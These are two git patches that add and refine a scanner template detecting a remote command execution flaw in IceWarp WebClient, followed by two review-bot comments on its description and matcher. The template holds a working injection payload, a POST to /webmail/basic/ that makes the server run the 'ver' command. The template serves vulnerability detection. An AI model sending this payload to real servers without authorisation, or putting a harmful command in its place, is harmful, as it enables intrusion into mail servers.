From ef74a354cacc4093cd8bbf2257a0fe8b0e84a70a Mon Sep 17 00:00:00 2001
From: GwanYeong Kim
Date: Fri, 9 Jul 2021 13:52:28 +0900
Subject: [PATCH 1/2] Create icewarp-webclient-rce.yaml
Signed-off-by: GwanYeong Kim
---
 .../other/icewarp-webclient-rce.yaml | 28 +++++++++++++++++++
 1 file changed, 28 insertions(+)
 create mode 100644 vulnerabilities/other/icewarp-webclient-rce.yaml
diff --git a/vulnerabilities/other/icewarp-webclient-rce.yaml b/vulnerabilities/other/icewarp-webclient-rce.yaml
new file mode 100644
index 0000000000..192fc314c3
--- /dev/null
+++ b/vulnerabilities/other/icewarp-webclient-rce.yaml
@@ -0,0 +1,28 @@
+id: icewarp-webclient-rce
+
+info:
+ name: IceWarp WebClient RCE
+ author: gy741
+ severity: critical
+ tags: icewarp,rce
+ reference: https://www.pwnwiki.org/index.php?title=IceWarp_WebClient_basic_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
+
+requests:
+ - raw:
+ - |
+ POST /webmail/basic/ HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ _dlg[captcha][target]=system(\'ver\')\
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Microsoft Windows"
+ part: body
+
+ - type: status
+ status:
+ - 302
From a0d643561f5705e37b739e48f24a9f7dbf8ec64d Mon Sep 17 00:00:00 2001
From: Prince Chaddha
Date: Sat, 10 Jul 2021 09:18:32 +0530
Subject: [PATCH 2/2] Update icewarp-webclient-rce.yaml
---
 vulnerabilities/other/icewarp-webclient-rce.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/vulnerabilities/other/icewarp-webclient-rce.yaml b/vulnerabilities/other/icewarp-webclient-rce.yaml
index 192fc314c3..caa8758541 100644
--- a/vulnerabilities/other/icewarp-webclient-rce.yaml
+++ b/vulnerabilities/other/icewarp-webclient-rce.yaml
@@ -20,7 +20,7 @@ requests:
 matchers:
 - type: word
 words:
- - "Microsoft Windows"
+ - "Microsoft Windows [Version"
 part: body

 - type: status
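Review bot: The `info:` block of the new template in PATCH 1/2 has no `description`, so nothing tells an operator that a clean result only covers Windows-hosted installs. The request asks the server to run `ver` and the word matcher looks for the Windows banner, so an IceWarp server on another OS would produce no match even if it had the same flaw (inferred from the matcher; the page does not say which platforms are affected). I would add under `info:` a line such as `description: Sends a POST to /webmail/basic/ that runs 'ver' on the target; confirms Windows-hosted IceWarp WebClient only, so no match is not proof of a patched server.` The single `reference` is a third-party wiki URL; a vendor advisory or affected-version range next to it would help triage, if one exists.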
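Review bot: Anchoring the word matcher on `Microsoft Windows [Version` in PATCH 2/2 cuts false positives but makes the check locale-dependent. Localized Windows builds print the bracketed label differently (lower-case `version`, or a translated word), and the word matcher is case-sensitive by default, so a vulnerable host could go unreported. Keying on the build number instead avoids that: `- type: regex` with `regex: ['Microsoft Windows \[[^\]]*\d+\.\d+\.\d+']` and `part: body`. The `matchers` list continues past the end of the hunk with the status check, which this change leaves as it was.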